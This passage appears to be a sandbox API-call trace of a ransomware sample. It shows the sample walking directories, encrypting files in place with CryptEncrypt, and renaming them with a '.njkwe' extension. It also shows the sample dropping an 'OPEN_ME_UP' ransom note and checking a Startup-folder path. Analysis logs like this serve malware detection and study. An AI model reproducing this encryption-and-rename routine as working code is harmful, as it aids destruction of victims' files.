nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.599] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0060.599] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0060.599] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0060.599] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0060.599] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0060.599] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 49 [0060.599] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0060.599] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.599] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0060.600] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.600] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.600] GetTickCount () returned 0x114f955 [0060.600] GetTickCount () returned 0x114f955 [0060.600] GetTickCount () returned 0x114f955 [0060.600] GetTickCount () returned 0x114f955 [0060.600] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.600] GetProcessHeap () returned 0xbe0000 [0060.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.600] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.602] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.602] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.603] GetProcessHeap () returned 0xbe0000 [0060.603] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.603] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.603] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.603] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.603] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.603] CloseHandle (hObject=0x42c) returned 1 [0060.604] GetProcessHeap () returned 0xbe0000 [0060.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.604] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0060.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0060.605] GetProcessHeap () returned 0xbe0000 [0060.605] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.605] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.605] FindClose (in: hFindFile=0xc19ee0 | out: hFindFile=0xc19ee0) returned 1 [0060.605] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0060.605] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1025\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0060.605] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0060.606] CloseHandle (hObject=0x428) returned 1 [0060.607] GetProcessHeap () returned 0xbe0000 [0060.607] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0060.607] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1028", cAlternateFileName="")) returned 1 [0060.607] lstrcmpiW (lpString1="1028", lpString2="Windows") returned -1 [0060.607] lstrcmpiW (lpString1="1028", lpString2="$Recycle.bin") returned 1 [0060.607] lstrcmpiW (lpString1="1028", lpString2="System Volume Information") returned -1 [0060.607] lstrcmpiW (lpString1="1028", lpString2="Program Files") returned -1 [0060.607] lstrcmpiW (lpString1="1028", lpString2="Program Files (x86)") returned -1 [0060.607] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028") returned 30 [0060.607] lstrcmpW (lpString1="1028", lpString2=".") returned 1 [0060.607] lstrcmpW (lpString1="1028", lpString2="..") returned 1 [0060.607] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.607] GetProcessHeap () returned 0xbe0000 [0060.607] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0060.607] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\*") returned 32 [0060.607] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2a0 [0060.608] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.608] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.608] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.608] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.608] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.608] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\.") returned 32 [0060.608] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.608] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.608] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.608] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.608] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.608] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.608] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.608] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\..") returned 33 [0060.608] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.608] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.608] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.608] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0060.608] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0060.608] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0060.608] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0060.608] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0060.608] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 39 [0060.608] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0060.608] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.608] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0060.608] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.608] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.609] GetTickCount () returned 0x114f955 [0060.609] GetTickCount () returned 0x114f955 [0060.609] GetTickCount () returned 0x114f955 [0060.609] GetTickCount () returned 0x114f955 [0060.609] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.609] GetProcessHeap () returned 0xbe0000 [0060.609] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.609] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x18a5, lpOverlapped=0x0) returned 1 [0060.610] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffe75b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.610] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x18a5, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x18a5, lpOverlapped=0x0) returned 1 [0060.610] GetProcessHeap () returned 0xbe0000 [0060.610] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.610] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.611] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.611] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.611] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.611] CloseHandle (hObject=0x42c) returned 1 [0060.612] GetProcessHeap () returned 0xbe0000 [0060.612] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.612] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0060.612] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0060.618] GetProcessHeap () returned 0xbe0000 [0060.618] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.618] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.618] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0060.618] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0060.618] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0060.619] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0060.619] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0060.619] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 48 [0060.619] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0060.619] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.619] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0060.619] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.619] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.664] GetTickCount () returned 0x114f994 [0060.664] GetTickCount () returned 0x114f994 [0060.664] GetTickCount () returned 0x114f994 [0060.664] GetTickCount () returned 0x114f994 [0060.664] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.664] GetProcessHeap () returned 0xbe0000 [0060.664] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.664] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.667] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.667] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.667] GetProcessHeap () returned 0xbe0000 [0060.667] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.667] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.667] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.667] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.667] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.667] CloseHandle (hObject=0x42c) returned 1 [0060.670] GetProcessHeap () returned 0xbe0000 [0060.670] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.670] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0060.670] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0060.670] GetProcessHeap () returned 0xbe0000 [0060.670] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.670] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.670] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0060.670] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0060.670] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0060.670] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0060.670] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0060.670] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 49 [0060.671] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0060.671] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.671] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0060.671] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.671] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.671] GetTickCount () returned 0x114f994 [0060.671] GetTickCount () returned 0x114f994 [0060.671] GetTickCount () returned 0x114f994 [0060.671] GetTickCount () returned 0x114f994 [0060.671] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.672] GetProcessHeap () returned 0xbe0000 [0060.672] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.672] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.673] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.673] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.673] GetProcessHeap () returned 0xbe0000 [0060.673] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.673] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.674] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.674] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.674] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.674] CloseHandle (hObject=0x42c) returned 1 [0060.676] GetProcessHeap () returned 0xbe0000 [0060.676] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.676] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0060.676] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0060.676] GetProcessHeap () returned 0xbe0000 [0060.676] HeapFree (in: 